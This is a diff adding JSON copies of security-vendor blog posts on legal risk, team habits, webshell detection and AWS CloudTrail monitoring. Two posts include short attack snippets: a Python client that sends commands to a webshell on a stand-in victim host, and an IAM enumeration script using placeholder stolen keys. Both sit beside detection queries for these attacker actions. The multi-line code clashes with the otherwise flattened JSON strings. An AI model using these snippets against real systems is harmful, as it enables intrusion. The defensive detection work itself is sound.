ways to mitigate these risks. Risk 1: Failing to implement risk-based security controls As companies face increasing pressure to expand and deliver more convenient services, it can be tempting to prioritize speed over security. However, failing to maintain security controls that are appropriate to the risk posed by data can result in significant legal exposure. The EU\u2019s General Data Protection Regulation (GDPR) and a number of state laws allow regulators to bring enforcement actions against companies that fail to maintain \u201creasonable\u201d security controls for personal information. And the new California Consumer Privacy Act (CCPA), which takes effect on January 1, 2020, provides a private right of action to California consumers whose personal information is breached as a result of \u201cunreasonable\u201d security. HOW TO MITIGATE THE RISK Despite the popularity of the term, there is no single definition of \u201creasonable\u201d security, but there is consensus that \u201creasonableness\u201d depends on the risk posed by the data in question. This is why companies should conduct a risk assessment for each type of dataset they maintain and implement risk-based controls, ideally using a recognized framework like the NIST Cybersecurity Framework. Risk 2: Overlooking vendor security Your company\u2019s security is only as good as the security of your vendors that maintain and/or access your data. Vendors are a popular attack vector for the bad guys who are looking for a point of entry into large corporate networks, as the vendors\u2019 security defenses may not be as strong as their clients\u2019. 
Unfortunately, even if a breach is the result of a vendor\u2019s subpar security, the data owner still bears legal responsibility for issuing breach notifications and providing credit monitoring (unless the contract with vendor says otherwise) and for responding to regulator inquiries. Additionally, proper vendor selection is part of \u201creasonable\u201d security, as described above. HOW TO MITIGATE THE RISK Require your vendors to sign a robust information security addendum or provide other proof of a mature information security program, like a third-party audit report (e.g., SOC 2 or ISO 27001). In addition, your vendors should be required to notify data owners as soon as possible following a breach that affects the owner\u2019s data. Ideally, your contract should also require the vendor to reimburse any costs associated with responding to such a breach, but many vendors will push back against these kinds of requirements. Risk 3: Not documenting security practices \u2013 or failing to put your policies into practice Even a company with state-of-the-art security practices faces risks if those practices aren\u2019t documented in policies that are regularly reviewed and updated. Not only are information security policies required under various laws, including Massachusetts\u2019 data security law and the New York Department of Financial Services cybersecurity regulations , but they\u2019re also essential for IPO readiness. Conversely, it\u2019s equally risky to establish policies that your company doesn\u2019t follow, or to make unsupported security claims to potential customers. This opens your company up to allegations of deception. Companies considering going public must be prepared to disclose material cybersecurity risks in registration statements, and you should expect the underwriters conducting diligence to request copies of information security policies. HOW TO MITIGATE THE RISK If your organization hasn\u2019t implemented information security policies, you need to document what practices are currently in place, and consult with outside counsel or an independent security assessor to determine whether you need to make improvements to comply with applicable law or industry standards. If your company already adopted information security policies, make sure they\u2019re regularly reviewed by management and updated to reflect current practices. Risk 4: Sidelining your legal team during incident response As the team with technical expertise and first-hand knowledge of the facts of a security incident, it\u2019s natural and appropriate for information security personnel to play a leading role when a security incident happens. However, with incidents that pose legal risk, legal teams (either in-house or external or both) play an equally critical role. When legal teams direct and coordinate response efforts with the IT folks, your company will have the ability to claim privilege over communications and work product \u2013 including the draft forensic reports if your providers are engaged under privilege. If you\u2019re successful, these claims can protect interim, incomplete conclusions and other sensitive information from disclosure during litigation and some types of regulatory investigations. You\u2019ll also want to involve your legal team to assess breach notification obligations and identify other areas of risk exposure throughout the incident response process. 
HOW TO MITIGATE THE RISK Make sure your company has incident response plans that designate internal or external counsel as being responsible for directing incident response efforts and engaging all third-party vendors. Using outside counsel that specializes in incident response has the added benefit of bolstering privilege claims and lending additional expertise. While there will always be unique legal risks associated with information security, the good news is that with some advanced planning you can mitigate these and better protect your company, its data and the customers you serve." +} \ No newline at end of file diff --git a/four-habits-of-highly-effective-security-teams.json b/four-habits-of-highly-effective-security-teams.json new file mode 100644 index 0000000000000000000000000000000000000000..e980d822d34a8faab12359ceb7db80fa09bc28c8 --- /dev/null +++ b/four-habits-of-highly-effective-security-teams.json @@ -0,0 +1,6 @@ +{ + "title": "Four habits of highly effective security teams", + "url": "https://expel.com/blog/four-habits-highly-effective-security-teams/", + "date": "May 6, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Four habits of highly effective security teams Security operations \u00b7 3 MIN READ \u00b7 PETER SILBERMAN \u00b7 MAY 6, 2019 \u00b7 TAGS: Employee retention / Managed security / Management / Planning / SOC No matter if your security team is big or small, I bet you feel understaffed to deliver on your mission. And if your \u201cteam\u201d is just you then you should multiply those feelings by 10x. You\u2019re not alone. In the absence of having the people and budget to snag all of the products on your wish list \u2014 or the people to help shrink your to-do list \u2014 how can you behave like a team twice your size and focus on the stuff that\u2019ll make the biggest impact? Here at Expel, we\u2019re fortunate to have a bunch of people who\u2019ve been managing teams and building security operations centers (SOCs) for eons. Looking back at our collective experience, we identified four consistent habits that all the highly effective security teams we\u2019ve been a part of have practiced. Here\u2019s what we observed and why it all matters, whether you\u2019re a security team of one or 100. 1. They understand what their products do When it comes to security tech, highly effective security teams focus on two things: 1) The alert signal each vendor\u2019s technology produces and 2) What questions they ask of their technology during an investigation. We work with more than two dozen different products here at Expel. We\u2019ve taken the time to generalize the various capabilities that an EDR, Network or SIEM vendor can offer an analyst. We think about the capabilities offered by each class of technology as a capability model. It doesn\u2019t matter how EDR vendor A or vendor B acquire files; our analysts know that vendor A and B offer an acquire file capability and they use Expel Workbench to fetch that file from either vendor. In short, creating a capability model is a good way for us to develop a structured understanding of the questions we can \u201cask\u201d our technology. 2. They take a common approach to investigating When something goes sideways and it\u2019s time to take action, highly effective security teams have a consistent approach to how they run an investigation. It\u2019s important that investigations follow a defined, repeatable process where analysts take the same actions for the same type of alert every time that alert pops up. 
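One way to keep that process out of people\u2019s heads and in front of every analyst is to write the playbook down as data. The sketch below is a minimal illustration (the alert type and steps are placeholders, not an actual Expel playbook) of what a defined, repeatable set of steps for a single alert type might look like:

# Minimal illustration of a written-down playbook: every analyst runs the same
# ordered steps for a given alert type, and the steps live in version control.
PLAYBOOKS = {
    'suspicious_login': [
        'Pull historical logins for the user to establish what normal looks like',
        'Compare source IP, geolocation and user agent against that baseline',
        'Check whether MFA was used and whether the account has other recent alerts',
        'Escalate to an incident if the activity cannot be explained; otherwise document and close',
    ],
}

def steps_for(alert_type):
    # Unknown alert types get a triage placeholder instead of ad hoc improvisation.
    return PLAYBOOKS.get(alert_type, ['Triage manually, then draft a playbook for this alert type'])

for step in steps_for('suspicious_login'):
    print(step)

The point is less the code than the habit: the steps are versioned, reviewable and identical for every analyst who picks up the alert.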
For example, when our SOC analysts see an alert for a suspicious login, they know their first step in the investigation is to grab historical data for that user to determine what constitutes \u201cnormal\u201d activity. Note that I said \u201cprocess\u201d \u2014 not \u201cprescription.\u201d Yes, you need a standard approach to taking action, but analysts still need to exercise good judgement and make quick decisions. There will always be alerts that turn your usual playbook on its head, which is why ongoing learning and training is so important. 3. They invest in training In my experience, the best security teams make training a priority. So once you\u2019ve got a grip on what your product(s) do and have your investigative process down, you need to get real hands-on practice \u2014 over and over again. One of our favorite ways to keep our analysts sharp is to run threat emulation exercises. Threat emulation is the process of simulating a realistic threat you\u2019re likely to encounter with a heavy emphasis on what happens after an attacker breaks in. It\u2019s the best way to flex those response muscles and improve your team\u2019s collective detection skills. If you want to create your own threat emulation exercise, we\u2019ve got step-by-step instructions right here. We\u2019ve also got some pro tips on how to build a cloud-focused threat emulation exercise in AWS. 4. They demonstrate value to their \u201ccustomers\u201d Finally, highly effective security teams demonstrate value to their customers. A great way of demonstrating value is to figure out how to show your work. Note that showing your work is not bringing an incident report to a board meeting. It\u2019s important to figure out what your customers want to understand about security and then adjust what and how you\u2019re presenting to make sure you\u2019re aligning with their business objectives. And when I say \u201ccustomers\u201d I\u2019m not just talking about the companies that pay you for services. These customers could be your CISO, CEO or a board member. If you\u2019re sitting there thinking that building all of these habits into your team\u2019s culture feels overwhelming, I get it. In that case, start small \u2014 pick one of the four habits and focus on getting your team to execute on that. For example, maybe you have a retention issue because the work isn\u2019t interesting or analysts feel like they aren\u2019t learning. So focus on finding more training opportunities for analysts to flex their detection muscles and have fun doing what they love. Find little ways to keep your security nerds happy and you\u2019ll have an engaged, talented and all-around awesome team." 
+} \ No newline at end of file diff --git a/from-webshell-weak-signals-to-meaningful-alert-in-four-steps.json b/from-webshell-weak-signals-to-meaningful-alert-in-four-steps.json new file mode 100644 index 0000000000000000000000000000000000000000..3cef25bd226e633d317d1ae9ed1cf5927c07adb1 --- /dev/null +++ b/from-webshell-weak-signals-to-meaningful-alert-in-four-steps.json @@ -0,0 +1,6 @@ +{ + "title": "From webshell weak signals to meaningful alert in four steps", + "url": "https://expel.com/blog/webshell-weak-signals-meaningful-alert-four-steps/", + "date": "Sep 19, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG From webshell weak signals to meaningful alert in four steps Tips \u00b7 7 MIN READ \u00b7 BEN BRIGIDA \u00b7 SEP 19, 2017 \u00b7 TAGS: Example / Get technical / How to / Tear sheet Over the past decade, security products have matured from delivering tactical detections to expanding visibility across an enterprise. While seeing more events can lead to empowering discoveries, turning the volume of events into useful investigative leads has been primarily left to the security one-percenters . In this post we\u2019ll show you a practical example of how you can make a weak signal actionable by combining events from your endpoint and network security technologies into one meaningful alert. Specifically, we\u2019ll walk through how you can create actionable detections for webshell activity. We\u2019ll use Sumo Logic as our SIEM; Palo Alto Networks firewall as our network security device ; and the following endpoint detection and response (EDR) solutions: Tanium or Carbon Black Step 0x00. Weak signals A weak signal is an event that doesn\u2019t contain enough context for you to easily determine the next investigative step. These types of alerts need an analyst to spend a lot of time validating them, and they tend to have a low true-positive rate. In most cases, these alerts are the first to be overlooked or pushed to the bottom of the queue for analyst review. Weak signals can take many different forms, depending on what security devices are deployed. For an endpoint product, weak signals often include: A file or registry modification on a host A module load by a process On the network side, these alerts can take the shape of: Outbound web traffic from users Inbound HTTP traffic to a web server Scanning and exploit attempts from the Internet On their own, any of these alerts \u2014 without additional context or analysis \u2014 are often useless and can be overwhelming. But what happens when you correlate some of these time-intensive alerts to tell a more comprehensive story? Let\u2019s take a peek at how this can benefit your organization with our webshell example. Step 0x01. Know what you\u2019re looking for (aka webshells 101) (Skip to Step 0x02 if you\u2019re familiar with webshells and already tell China Chopper jokes) Webshells often serve as an initial foothold that attackers can use to compromise your internal network. They give an attacker access to a shell on a server in a victim\u2019s environment via a web browser. To create one, an attacker compromises a web server or web-accessible directory. The attacker will drop a script (or modify an existing page) which allows them to issue remote commands to the compromised system. The scripts can be as small as a few bytes, and they exist in many language flavors (ASP, ASPX, CFM, JSP, and PHP, to name a few). Some contain additional features that help attackers perform reconnaissance, such as file browsers or scanning modules. 
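To make that concrete, here\u2019s a minimal sketch (purely illustrative, with a made-up host and path) of how an attacker drives a dropped webshell once it\u2019s in place. It\u2019s just ordinary HTTP with a command tucked into a request parameter, which is exactly why the traffic blends into normal inbound web requests:

import requests

# Hypothetical webshell dropped in a web-accessible directory on a compromised server.
# The server-side script simply runs whatever lands in the 'cmd' parameter.
SHELL_URL = 'http://victim.example.com/uploads/helper.php'

def run_command(cmd):
    # To the web server this looks like any other GET request in the access log.
    response = requests.get(SHELL_URL, params={'cmd': cmd}, timeout=10)
    return response.text

print(run_command('whoami'))    # recon: which account is the web server running as?
print(run_command('ipconfig'))  # recon: where does this host sit on the network?

Because each command is just another entry in the access log, the endpoint file-write signal described below is what turns this from nearly invisible into detectable.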
Webshells are primarily delivered through web application exploits or insecure practices, including: Web administrative interfaces with default or weak credentials Sites that allow arbitrary file uploads Web servers with remote file inclusion, SQL or cross-site scripting (XSS) vulnerabilities Content management system (CMS) vulnerabilities Step 0x02. Alerts in Palo Alto Networks Network vendors like Palo Alto Networks dedicate resources to researching vulnerabilities and developing rules that signal when someone attempts to use an exploit. However, external vulnerability scanning is now part of the normal white noise of the internet. Rarely does an attempted exploit mean that you were actually compromised. So you have to do more work to answer the question, \u201cWas the system compromised?\u201d To answer that question, an analyst has to search for related network alerts from the target system. If a payload delivered to the system is detected, or the command-and-control (C2) method is known (via URL categorization or based on the contents of the packets), the analyst can determine that the exploit succeeded. Keep in mind that absence of evidence is not evidence of absence. Attackers often use payloads or C2 methods to avoid these types of network detection. For example, passive backdoors like webshells won\u2019t generate traffic until the attacker chooses to interact with the resource. In this case, if the attacker used a vulnerability to drop a webshell, we wouldn\u2019t necessarily have network evidence indicating the host was compromised. That\u2019s why, in and of themselves, vulnerability alerts can be difficult to action. But\u2026 there is hope. Here\u2019s why. Even if we don\u2019t have any related network alerts to analyze, we can build actionable alerts by combining network alerts for vulnerability attempts with relevant endpoint events, such as file modifications. By correlating these alerts you can quickly reduce the flood of vulnerability alerts and focus on the events where the vulnerability exploitation may have been successful. First, we need to find all the exploit attempts. We\u2019ll collect all the Palo Alto Network activity from hosts that generated an alert in the \u201cVulnerability\u201d threat category . To accomplish this, we\u2019ve configured Palo Alto Networks to forward \u201cVulnerability\u201d alerts to Sumo Logic . Once you\u2019ve done that, you can move on to step 0x03. Step 0x03. Hi ho, hi ho, it\u2019s off to the endpoint we go Now that we know everywhere there could be a webshell, it\u2019s time to combine the weak signals together. To do that, we need to correlate the network alerts with any servers that have had script file modifications in a web-accessible directory within 15 minutes of the alert. There are several ways to make the correlation. We\u2019ll illustrate how you can do it with two of the most common endpoint detection and response tools. Here are some specific examples of queries you can perform with an endpoint security product to capture webshell activity. Keep in mind that these queries are not comprehensive lists of web accessible locations. They\u2019re just some ideas to get you off on the right foot. Carbon Black Response Carbon Black Response tracks network connections, module loads, remote threads, and file modifications on every endpoint where it\u2019s deployed. You can query particular events within processes using a feature that Carbon Black calls \u201c Watchlists \u201d. 
The watchlists allow you to save queries, so Carbon Black can inform you whenever a process or binary matches certain event criteria. By creating a watchlist for file modifications in web-accessible directories, we can develop a weak signal to inform our security team when something resembling a webshell is created. An example of a query for webshell creation with Carbon Black might look something like: (filemod:wwwroot* or filemod:htdocs*) and (filemod:.aspx or filemod:.jsp or filemod:.cfm or filemod:.asp or filemod:.php) AND host_type:\"server\" The data is sent to Sumo Logic by configuring the Carbon Black event forwarder . In our lab, we deployed the Event Forwarder on the Carbon Black Response Appliance and sent the output as JSON to a Sumo Logic HTTP Source . Tanium The Tanium Trace module uses a local datastore to record process events, network connections and file modifications on each endpoint where Trace is deployed. You query it by asking questions through the Tanium Console. Saved Questions are queries that are saved and recur on a predetermined basis. By using the Tanium \u201cTrace File Operations\u201d sensor to query for any new files created in web-accessible directories we can identify webshell-like activity. An example of a saved question for webshell creation with Tanium is: Get Trace File Operations[1 hour,, 1, 0, 10, 0, (?i).*(wwwroot|htdocs).*.(aspx|jsp|cfm|asp|php), , , , ] and IPv4 Address and Operating System from all machines with Operating System containing \"server\" The data is sent to Sumo Logic by configuring the Tanium Connect module to send the results of the saved question as JSON to a Sumo Logic HTTP Source. Step 0x04. Correlation The final step is to combine the weak signal alerts from the network device and the alert from the endpoint. To correlate these alerts we\u2019ve used Sumo Logic as our SIEM. Please note the following about the queries we\u2019re providing: These queries are intended to work across Sumo Logic regardless of whether field extraction rules are set up. You should use field extraction on ingestion; an example of this for Palo Alto Networks can be found here . The timewindow operator ensures we only join events that occurred within a 15-minute window of each other. This window of time may work for you, or you may need to tweak it depending on endpoint timestamps, clock skew, or other factors. We configured logs to be sent to Sumo Logic in the following format: Palo Alto Networks \u2013 CSV Carbon Black \u2013 JSON Tanium \u2013 JSON The query also assumes you\u2019ve sent this data to Sumo Logic in the above formats.
Our query using Tanium and Palo Alto Networks is: \"Expel - Potential Webshell Write\" OR \"vulnerability\" | join (json auto keys \"Expel - Potential Webshell Write.IPv4 Address\", \"Expel - Potential Webshell Write.Process Path\", \"Expel - Potential Webshell Write.File Path\", \"Expel - Potential Webshell Write.QuestionName\", \"Expel - Potential Webshell Write.Endpoint Name\" as interface_ip, process_path, file_path, question_name, host_name) as tn, (split _raw delim=',' extract 7 as gen_time, 9 as dst_ip, 33 as threat_id) as panw on tn.interface_ip = panw.dst_ip timewindow 15m | fields tn_interface_ip, tn_host_name, tn_process_path, tn_file_path, panw_threat_id, tn_question_name, panw_gen_time Our query using Carbon Black and Palo Alto Networks is: \"alert.watchlist.hit.query.process\" OR \"vulnerability\" | join (json auto keys \"interface_ip\",\"process_path\",\"ioc_attr\",\"watchlist_name\",\"computer_name\",\"created_time\", \"ioc_attr\" as interface_ip, process_path, ioc_match, watchlist_name, host_name, created_time, ioc_attr) as cb, (split _raw delim=',' extract 7 as gen_time, 9 as dst_ip, 33 as threat_id) as panw on cb.interface_ip = panw.dst_ip timewindow 15m | fields cb_interface_ip, cb_host_name, cb_process_path, cb_ioc_attr, panw_threat_id, cb_watchlist_name, panw_gen_time, cb_created_time \u2014 If you\u2019re interested in taking action on what was discussed in this post, below is a tearsheet with all the queries discussed to put this correlation into practice. Executable Actions Carbon Black Watchlist (filemod:wwwroot* or filemod:htdocs*) and (filemod:.aspx or filemod:.jsp or filemod:.cfm or filemod:.asp or filemod:.php) AND host_type:\"server\" Tanium Question Get Trace File Operations[1 hour,, 1, 0, 10, 0, (?i).*(wwwroot|htdocs).*.(aspx|jsp|cfm|asp|php), , , , ] and IPv4 Address and Operating System from all machines with Operating System containing \"server\" Sumo Logic Query Carbon Black \"alert.watchlist.hit.query.process\" OR \"vulnerability\" | join (json auto keys \"interface_ip\",\"process_path\",\"ioc_attr\",\"watchlist_name\",\"computer_name\",\"created_time\", \"ioc_attr\" as interface_ip, process_path, ioc_match, watchlist_name, host_name, created_time, ioc_attr) as cb, (split _raw delim=',' extract 7 as gen_time, 9 as dst_ip, 33 as threat_id) as panw on cb.interface_ip = panw.dst_ip timewindow 15m | fields cb_interface_ip, cb_host_name, cb_process_path, cb_ioc_attr, panw_threat_id, cb_watchlist_name, panw_gen_time, cb_created_time Sumo Logic Query Tanium \"Expel - Potential Webshell Write\" OR \"vulnerability\" | join (json auto keys \"Expel - Potential Webshell Write.IPv4 Address\", \"Expel - Potential Webshell Write.Process Path\", \"Expel - Potential Webshell Write.File Path\", \"Expel - Potential Webshell Write.QuestionName\", \"Expel - Potential Webshell Write.Endpoint Name\" as interface_ip, process_path, file_path, question_name, host_name) as tn, (split _raw delim=',' extract 7 as gen_time, 9 as dst_ip, 33 as threat_id) as panw on tn.interface_ip = panw.dst_ip timewindow 15m | fields tn_interface_ip, tn_host_name, tn_process_path, tn_file_path, panw_threat_id, tn_question_name, panw_gen_time Happy Hunting!" 
+} \ No newline at end of file diff --git a/generate-security-signals-with-sumo-logic-aws-cloudtrail.json b/generate-security-signals-with-sumo-logic-aws-cloudtrail.json new file mode 100644 index 0000000000000000000000000000000000000000..93378f852d4db4c1c63d53939366b30a5d31637b --- /dev/null +++ b/generate-security-signals-with-sumo-logic-aws-cloudtrail.json @@ -0,0 +1,6 @@ +{ + "title": "Generate Security Signals with Sumo Logic & AWS Cloudtrail", + "url": "https://expel.com/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/", + "date": "Sep 10, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Generate Strong Security Signals with Sumo Logic & AWS Cloudtrail Security operations \u00b7 7 MIN READ \u00b7 DAN WHALEN \u00b7 SEP 10, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / SOC As orgs increasingly shift some of their workloads to cloud providers like Amazon Web Services (AWS), it\u2019s often challenging to get the right level of visibility into these new environments for security monitoring purposes. Sure, security professionals have had decades of experience monitoring traditional enterprise networks, but services like AWS, Microsoft Azure and Google Cloud Platform come with additional sources of valuable data \u2014 which is frustratingly unfamiliar if you\u2019re used to racking and stacking your own servers. Combine that uncertainty with an already long laundry list and the result is this: Most organizations using cloud platforms are not taking full advantage of the signals available to them. But there\u2019s some good news: There are lots of great technology solutions we can use to help us get a better handle on those signals. In this post, I\u2019ll show you how Expel uses a SIEM (in this example, we\u2019ll take a look at Sumo Logic ) to generate security leads from AWS signals. Regardless of what SIEM you use, I\u2019ll share some detection use cases (with examples!) that you can try out in your own environment. How does a SIEM help? Anyone who works in security knows that there are two high-level problems that need to be solved to effectively monitor an environment: Collecting the data you need; and Drawing actionable insights from the data A log management (aka SIEM) solution like Sumo Logic does all of the heavy lifting, connecting up to your sources of data and providing an intuitive search interface that lets you generate alerts and perform investigations. For example, you can easily onboard Amazon CloudTrail data from AWS with the built-in connector (more on CloudTrail in a moment). In a few easy steps, you can create a trail and get data flowing by granting Sumo Logic access to the S3 bucket containing the logs. This can be done right in the AWS console with a few button clicks or via the CloudTrail API and takes about five minutes. Once you\u2019ve hooked up Sumo Logic, you can validate data flow by issuing queries against the CloudTrail data like so: Now that you\u2019ve got data flowing, the next step is making sense of it. Building a detection strategy for Amazon CloudTrail Why Amazon CloudTrail is useful If you aren\u2019t familiar with Amazon CloudTrail, think of it as an audit log of all AWS activities that happen in your account. By default, AWS enables a default CloudTrail for every account \u2014 it records the most essential events and retains them for 90 days. 
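If you want to poke at what that default trail captures, a minimal sketch like the one below (assuming boto3 and whatever credentials and region you already have configured) pulls recent console logins straight out of the 90-day event history:

import boto3

# Assumes credentials are already set up (named profile, environment variables, etc.).
cloudtrail = boto3.client('cloudtrail', region_name='us-east-1')

# LookupEvents searches the default 90-day event history; no custom trail required.
response = cloudtrail.lookup_events(
    LookupAttributes=[{'AttributeKey': 'EventName', 'AttributeValue': 'ConsoleLogin'}],
    MaxResults=10,
)

for event in response['Events']:
    print(event.get('EventTime'), event.get('Username'), event.get('EventName'))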
This is helpful as a default, but as a best practice it\u2019s important to create your own CloudTrail that sends events to an S3 bucket of your choosing. This allows you to control the granularity of the events that get logged and the length of time those logs are retained. You can also use AWS Organizations to enforce a global CloudTrail that sends audit data from all of your AWS accounts (including all regions) to one master S3 bucket. This ensures that you never end up in a situation where you\u2019re missing audit data needed for a compliance requirement (or \u2014 oh noes! \u2014 an active security investigation). Making sense of CloudTrail data Getting data flowing is relatively easy, but making sense of it all can be overwhelming (especially if it\u2019s the first time you\u2019re working with it). At Expel, we maintain a detection and response strategy for AWS that defines what signals we look for and how our team responds. To build a detection strategy, we consider the attack lifecycle and make sure we have layered signals in place to detect attacker or risky behaviors. We think about signal in terms of these three categories, which helps us identify areas of risk and brainstorm detection use cases. Access (how does someone enter the environment), Movement (how does data move around), and Storage (where does data live). Below are a few examples that show what some of these use cases look like: Brainstorming at a high level where your areas of risk are and what compensating controls (including detection use cases) you have in place is a healthy exercise that orgs should do routinely (We do this!). Generating valuable AWS signals Now I\u2019ll move on to the fun part. Let\u2019s dig into a few examples of CloudTrail-based signals that we\u2019ve found valuable that might be helpful to you and your team (if you\u2019re lucky enough to have one) as well. Suspicious logins Credential theft isn\u2019t a new attack vector by any means, but it\u2019s still an issue for orgs of all shapes and sizes. Particularly as orgs start to use AWS, managing developer credentials gets challenging. As a result, a compromise of a developer workstation can quickly lead to a greater compromise of an AWS environment if you don\u2019t have the right controls and signals in place. So how can you use CloudTrail logs to help zero in on this problem? Check out the query below as a starting point: _sourceCategory = {{sourceCategory}} | parse regex \"(?<raw>{.*)\" | json field=raw \"eventName\", \"sourceIPAddress\", \"userAgent\", \"userIdentity.type\", \"userIdentity.arn\", \"userIdentity.userName\", \"additionalEventData.MFAUsed\" as event_name, src_ip, user_agent, user_type, user_arn, user_name, mfa nodrop | lookup country_code from geo://location on ip = src_ip | where event_name = \"ConsoleLogin\" and mfa != \"Yes\" and country_code not in (\"US\") | count by country_code, mfa, user_type, user_arn, src_ip, user_agent What we\u2019re looking for: AWS console logins where MFA wasn\u2019t used Unusual geo-location for the source IP address (customizable for your org) Tips and tricks: Consider time of day/day of week as a condition. Should anyone be logging in on the weekend? Account discovery Let\u2019s assume that an attacker gets authenticated access to an environment. What happens next? In our experience, an attacker usually starts to enumerate the AWS account, listing IAM Users, Groups and Roles, and generally poking around the account to understand it.
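That enumeration phase isn\u2019t exotic. With a stolen access key it can be as simple as the sketch below (an illustration with placeholder credentials, not taken from any particular toolkit), and every one of these calls lands in CloudTrail whether it succeeds or not:

import boto3
from botocore.exceptions import ClientError

# Hypothetical stolen credentials; each call below shows up in CloudTrail as an
# iam.amazonaws.com event (ListUsers, ListRoles, ListGroups, ListPolicies).
session = boto3.Session(
    aws_access_key_id='AKIAEXAMPLEEXAMPLE',
    aws_secret_access_key='placeholder-secret-key',
)
iam = session.client('iam')

for call in ('list_users', 'list_roles', 'list_groups', 'list_policies'):
    try:
        getattr(iam, call)()
        print(call, 'succeeded')
    except ClientError as error:
        # Denied calls are exactly the AccessDenied burst the query below keys on.
        print(call, 'failed:', error.response['Error']['Code'])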
One common side effect is a burst in API failures as the attacker may not have the necessary permissions to green light all of their attempted actions. Using this as a hypothesis, let\u2019s build a signal to alert when this happens: _sourceCategory = {{sourceCategory}} | parse regex \"(?<raw>{.*)\" | json field=raw \"eventName\", \"errorCode\", \"errorMessage\", \"sourceIPAddress\", \"userIdentity.userName\", \"userIdentity.type\", \"eventSource\" as event_name, error_code, error_msg, src_ip, user_name, user_type, event_source nodrop | where error_code = \"AccessDenied\" | timeslice 1h | count as failures, count_distinct(event_name) as methods, count_distinct(event_source) as sources by _timeslice, user_type, user_name, event_source, error_msg, src_ip | where failures > 5 and methods > 1 and sources > 1 What we\u2019re looking for: A burst in AccessDenied errors over a period of one hour Multiple unique failed API calls Multiple unique AWS services generating failures Tips and tricks: You may find some noisy service accounts when first implementing this signal. This is a good opportunity to fix any broken policy documents or exclude specific accounts that you expect to generate failures. Maintaining access If an attacker gains an initial foothold in an environment, the attacker\u2019s next objective is to figure out a way to maintain that access. In a traditional enterprise, that might look like installing a service, setting up a scheduled task or creating a backdoor user account. What does this look like in AWS? It turns out there are some parallels \u2013 Rhino Security Labs has done a great job with Pacu, an open-source AWS exploitation toolkit (think Metasploit for AWS) that illustrates some of these behaviors. As an example, AWS Lambda can be used as a persistence mechanism: _sourceCategory = {{sourceCategory}} | parse regex \"(?<raw>{.*)\" | json field=raw \"eventName\", \"userIdentity.invokedBy\" as event_name, invoked_by nodrop | where invoked_by = \"lambda.amazonaws.com\" and event_name in (\"CreateAccessKey\", \"AuthorizeSecurityGroupIngress\", \"UpdateAssumeRolePolicy\") What we\u2019re looking for: A lambda function executing a suspicious action by: Creating an access key to backdoor an IAM user Updating a security group to allow ingress on a port Updating an assume role policy to allow external access Tips and tricks: Implement least privilege to prevent these persistence mechanisms. Don\u2019t grant users access to services they don\u2019t need. Evading defenses As a final example, determined attackers attempt to evade detection. Since CloudTrail logs nearly everything an attacker might want to do in an environment, CloudTrail is also an attack target. If an attacker has the right permissions, he or she can stop and/or delete a CloudTrail, making it more difficult for an organization to identify threats and respond. You can identify this activity by looking for the following API calls: _sourceCategory = {{sourceCategory}} | parse regex \"(?<raw>{.*)\" | json field=raw \"eventName\", \"sourceIPAddress\", \"userIdentity.arn\", \"userIdentity.type\", \"eventSource\" as event_name, src_ip, user_arn, user_type, event_source nodrop | where event_name in (\"DeleteTrail\", \"StopLogging\", \"DeleteLogGroup\", \"DeleteLogStream\", \"DeleteDestination\") What we\u2019re looking for: An attacker deleting audit data by: Stopping or deleting a CloudTrail Deleting a log group or stream from CloudWatch Deleting a CloudWatch destination Tips and tricks: Using AWS Organization trails is a huge help here.
An attacker can\u2019t stop or delete a trail that is enforced by the master account. He or she also can\u2019t disable the default EventHistory trail that exists for each AWS account. Bringing it all together Getting all of this set up is a large step forward if you\u2019re just getting started with AWS monitoring, but I\u2019d be remiss if I didn\u2019t mention one last piece of this puzzle: operationalizing these alerts. All of this work would go to waste without a well thought-out process for alert triage and investigation (we\u2019ll dive deeper into that topic in a future blog post). Generating alerts is great, but you\u2019ve got to make sure they\u2019re getting in front of the right people. Sumo Logic (and most SIEM technologies) have multiple options including dashboards, in-console workflows and other ways to send notifications to external services via email or webhooks. You may decide, for example, that you\u2019d like to send a Slack message to a team of developers for activity that occurs in your development account. Alternatively, if you and/or your team is bogged down already with a million other to-dos and you simply don\u2019t have the bandwidth to develop and respond to alerts, consider working with a third party. Yes, we\u2019re biased, but we\u2019d love to chat if you think we might be able to help. Getting a handle on your cloud infrastructure isn\u2019t always easy. Collecting and making use of audit data that these platforms generate \u2014 like AWS CloudTrail \u2014 is an important part of that mission and a good place to start." +} \ No newline at end of file diff --git a/get-your-security-tools-in-order-seven-tactics-you-should.json b/get-your-security-tools-in-order-seven-tactics-you-should.json new file mode 100644 index 0000000000000000000000000000000000000000..86c4521aeb22b08247749b20457a300dac9454ff --- /dev/null +++ b/get-your-security-tools-in-order-seven-tactics-you-should.json @@ -0,0 +1,6 @@ +{ + "title": "Get your security tools in order: seven tactics you should ...", + "url": "https://expel.com/blog/get-security-tools-order-seven-tactics-know/", + "date": "Sep 7, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Get your security tools in order: seven tactics you should know Talent \u00b7 3 MIN READ \u00b7 YANEK KORFF \u00b7 SEP 7, 2017 \u00b7 TAGS: Employee retention / Great place to work / Management / Selecting tech / Tools At the tail end of the last century (doesn\u2019t that sound a lot longer ago than 17 years?), the Gallup organization surveyed 80,000 managers over the course of 25 years. Their goal was to understand what truly exceptional managers do differently to drive performance\u2026 and to create great places to work. Many of you are probably familiar with the book summarizing the results by Marcus Buckingham and Curt Coffman called \u201c First, Break All The Rules .\u201d I\u2019ll spare you the entire book summary and draw your attention to one particular bit. Their research pointed to twelve questions, which, when answered affirmatively, correlate to a high-performance work environment. And one of those questions (in fact it was #2 on the list) was the following: Do I have the equipment and material I need to do my work right? Well now, that seems pretty straightforward. Of course you\u2019d want your people to have the right tools for the job. Who wouldn\u2019t do that? Turns out, almost everyone. 
